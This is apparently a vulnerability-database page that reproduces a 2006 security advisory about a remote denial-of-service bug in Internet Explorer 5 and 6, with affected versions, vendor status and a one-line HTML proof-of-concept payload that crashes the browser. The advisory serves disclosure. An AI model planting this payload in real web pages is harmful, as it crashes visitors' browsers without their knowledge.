Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MSIEDoS.txt

🗓️ 21 Jan 2006 00:00:00Reported by Inge HenriksenType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

Microsoft Internet Explorer Remote DoS using IMG & XML elements vulnerabilit

Code
`Advisory Name  
Microsoft(R) Internet Explorer 5 & 6 Remote Denial of Service (DoS) using IMG & XML elements  
  
Release Date  
14. January 2006  
  
Vulnerable Product  
Microsoft(R) Internet Explorer 5  
Microsoft(R) Internet Explorer 6  
  
Tested and Confirmed Vulerable  
Microsoft® Windows® XP Professional with Service Pack 2 and IE 6.0.2900.2180.xpsp_sp2_gdr.050301-1519  
Microsoft® Windows® Server 2003 with IE 6.0.2790.0  
Microsoft® Windows® 2000 Advanced Server 5.00.2195 with Service Pack 4 and IE 5.00.3700.1000  
Other combinations are likely to be vulnerable, so far all systems that I have tested had the bug.  
  
Severity  
Medium  
  
Discovered by  
Inge Henriksen ([email protected]) http://ingehenriksen.blogspot.com/  
  
Vendor Status  
Notified 30. December 2005, no fix at present.  
  
Arbitrary Code Injection  
This is a null pointer dereference, thanks to H D Moore from Metasploit for help on this issue.  
  
Overview  
I have found that Microsoft(R) Internet Explorer 5 and Microsoft(R) Internet Explorer 6 are vulnerable to a Denial of Service. So far all combinations of OS's and IE versions I have tested are vulnerable. The exploit is triggered by bad HTML data combined with a bad XML block, this html code can by hidden inside a webpage etc.   
  
Proof of Concept  
Any HTML page that contain the following HTML code will cause the DoS:  
  
<table><tr><td><IMG align=left>X X X<?xml:namespace prefix=v ><v:X style="HEIGHT:1"></td></tr></table>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jan 2006 00:00Current
7.4High risk
Vulners AI Score7.4
microsoft internet explorerremote denial of servicevulnerable productwindows xpwindows server 2003windows 2000medium severityinge henriksenbooleansoftarbitrary code injectionnull pointer dereferencemetasploitproof of concept
27